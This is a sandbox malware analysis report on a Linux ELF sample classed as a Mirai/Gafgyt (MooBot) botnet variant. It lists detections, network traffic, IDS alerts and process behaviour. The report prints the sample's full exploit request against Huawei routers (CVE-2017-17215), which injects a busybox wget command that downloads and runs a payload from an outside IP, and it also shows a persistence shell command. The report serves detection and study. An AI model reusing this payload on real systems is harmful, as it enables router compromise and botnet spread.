          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.114.110.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.110.209.213:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.90.193.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 20.229.193.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.33.105.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.249.160.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.102.114.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.44.7.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.121.110.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.10.107.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.22.195.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 169.239.181.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.56.228.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 32.103.136.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.38.243.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.218.0.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.40.152.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.248.27.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.228.64.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.26.59.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.233.174.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.106.32.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.67.77.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 145.131.235.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.222.167.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.70.211.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 114.59.76.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.116.22.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.241.131.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 164.231.68.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.103.171.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 57.48.92.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.117.203.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.27.58.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.134.178.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.24.203.236:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.186.49.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.150.148.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.119.211.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.5.64.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.14.191.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 183.176.52.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 82.233.177.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 40.151.108.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 87.42.255.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.102.19.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.11.111.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.245.242.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.244.197.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 197.60.185.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 157.166.237.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:22607 -> 41.143.67.16:37215
          Source: unknownDNS traffic detected: queries for: test.zxyes.xyz
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
          Source: v8OWS3Ylfj.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: v8OWS3Ylfj.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownHTTP traffic detected:
          POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 456
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

          System Summary

          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Process Memory Space: v8OWS3Ylfj.elf PID: 6223, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: v8OWS3Ylfj.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: Process Memory Space: v8OWS3Ylfj.elf PID: 6223, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engineClassification label: mal92.troj.linELF@0/0@1/0
          Source: /tmp/v8OWS3Ylfj.elf (PID: 6224)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv \"/tmp/v8OWS3Ylfj.elf \\xdc\u0420\\xff\\x84\\x88&bin/watchdog; chmod 777 bin/watchdog"
          Source: submitted sampleStderr: sh: 1: Syntax error: Unterminated quoted string: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46180 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42668 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 42668
          Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32862 -> 37215

          Stealing of Sensitive Information

          Source: Yara match File source: v8OWS3Ylfj.elf, type: SAMPLE
          Source: Yara match File source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: v8OWS3Ylfj.elf, type: SAMPLE
          Source: Yara match File source: 6223.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Scripting | Path Interception | Path Interception | 1 Scripting | 1 OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          No configs have been found
          [Behavior graph: ID 830702, sample v8OWS3Ylfj.elf, start date 20/03/2023, architecture LINUX, score 92]
          Source | Detection | Scanner | Label | Link
          v8OWS3Ylfj.elf | 57% | Virustotal | | Browse
          v8OWS3Ylfj.elf | 59% | ReversingLabs | Linux.Trojan.LnxMirai |
          v8OWS3Ylfj.elf | 100% | Joe Sandbox ML | |
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          test.zxyes.xyz | 2% | Virustotal | | Browse
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          test.zxyes.xyz | 195.133.40.202 | true | true | | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/soap/encoding/ | v8OWS3Ylfj.elf | false | | high
          http://schemas.xmlsoap.org/soap/envelope/ | v8OWS3Ylfj.elf | false | | high
              No context
              No created / dropped files found
              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.548832915017976
              TrID:
              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
              File name:v8OWS3Ylfj.elf
              File size:55632
              MD5:2b318e2fa59dccaa45cc59c5fea7e082
              SHA1:d5bf527325fbfbda5d26272bb88874bc504dd260
              SHA256:7bbce804ece6b26f0fcf2937fd5217518848f044c95cc6d033f5a08f04598a06
              SHA512:cb9c55ee85b5d0a8d881201cd99b4b998353e58239350d597db1bb5a2ce09bde7a7e72a941a9c6b18fba8cf43a86e837297ca33dfcd8913e86c7715ca4972f66
              SSDEEP:1536:JeESt/basV2rcZhG6ySN7na65lSR9zWOIaEjrqMds:JeESt/basVTgS7na65QRVtXESS
              TLSH:A9436BC4F643D8F5EC8705702077FB379B72E1E922A8D647D3B4D932AC52651EA06A8C
              File Content Preview:.ELF....................d...4...........4. ...(..............................................e...e......H(..........Q.td............................U..S.......w....h........[]...$.............U......=.g...t..5....$e.....$e......u........t....h.T..........

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:
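              Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
               | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
              .init | PROGBITS | 0x8048094 | 0x94 | 0x1c | 0x0 | 0x6 | AX | 0 | 0 | 1
              .text | PROGBITS | 0x80480b0 | 0xb0 | 0xb436 | 0x0 | 0x6 | AX | 0 | 0 | 16
              .fini | PROGBITS | 0x80534e6 | 0xb4e6 | 0x17 | 0x0 | 0x6 | AX | 0 | 0 | 1
              .rodata | PROGBITS | 0x8053500 | 0xb500 | 0x1ffc | 0x0 | 0x2 | A | 0 | 0 | 32
              .ctors | PROGBITS | 0x8056500 | 0xd500 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
              .dtors | PROGBITS | 0x8056508 | 0xd508 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
              .data | PROGBITS | 0x8056520 | 0xd520 | 0x260 | 0x0 | 0x3 | WA | 0 | 0 | 32
              .bss | NOBITS | 0x8056780 | 0xd780 | 0x25c8 | 0x0 | 0x3 | WA | 0 | 0 | 32
              .shstrtab | STRTAB | 0x0 | 0xd780 | 0x3e | 0x0 | 0x0 | | 0 | 0 | 1

              Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
              LOAD | 0x0 | 0x8048000 | 0x8048000 | 0xd4fc | 0xd4fc | 6.5875 | 0x5 | R E | 0x1000 | | .init .text .fini .rodata
              LOAD | 0xd500 | 0x8056500 | 0x8056500 | 0x280 | 0x2848 | 3.4669 | 0x6 | RW | 0x1000 | | .ctors .dtors .data .bss
              GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 | |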
              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              03/20/23-16:13:48.596290 | TCP | 2030490 | ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) | 36176 | 56999 | 192.168.2.23 | 195.133.40.202
              03/20/23-16:13:53.166618 | TCP | 2030489 | ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response | 56999 | 36176 | 195.133.40.202 | 192.168.2.23
              03/20/23-16:13:57.691757 | TCP | 2835222 | ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) | 57976 | 37215 | 192.168.2.23 | 195.164.211.50
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Mar 20, 2023 16:13:48.544802904 CET | 192.168.2.23 | 8.8.8.8 | 0x5faf | Standard query (0) | test.zxyes.xyz | A (IP address) | IN (0x0001) | false

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Mar 20, 2023 16:13:48.568625927 CET | 8.8.8.8 | 192.168.2.23 | 0x5faf | No error (0) | test.zxyes.xyz | | 195.133.40.202 | A (IP address) | IN (0x0001) | false

              System Behavior

              Start time:16:13:47
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:/tmp/v8OWS3Ylfj.elf
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              Start time:16:13:47
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              Start time:16:13:47
              Start date:20/03/2023
              Path:/bin/sh
              Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv \"/tmp/v8OWS3Ylfj.elf \\xdc\u0420\\xff\\x84\\x88&bin/watchdog; chmod 777 bin/watchdog"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              Start time:16:13:48
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              Start time:16:13:48
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082

              Start time:16:13:48
              Start date:20/03/2023
              Path:/tmp/v8OWS3Ylfj.elf
              Arguments:n/a
              File size:55632 bytes
              MD5 hash:2b318e2fa59dccaa45cc59c5fea7e082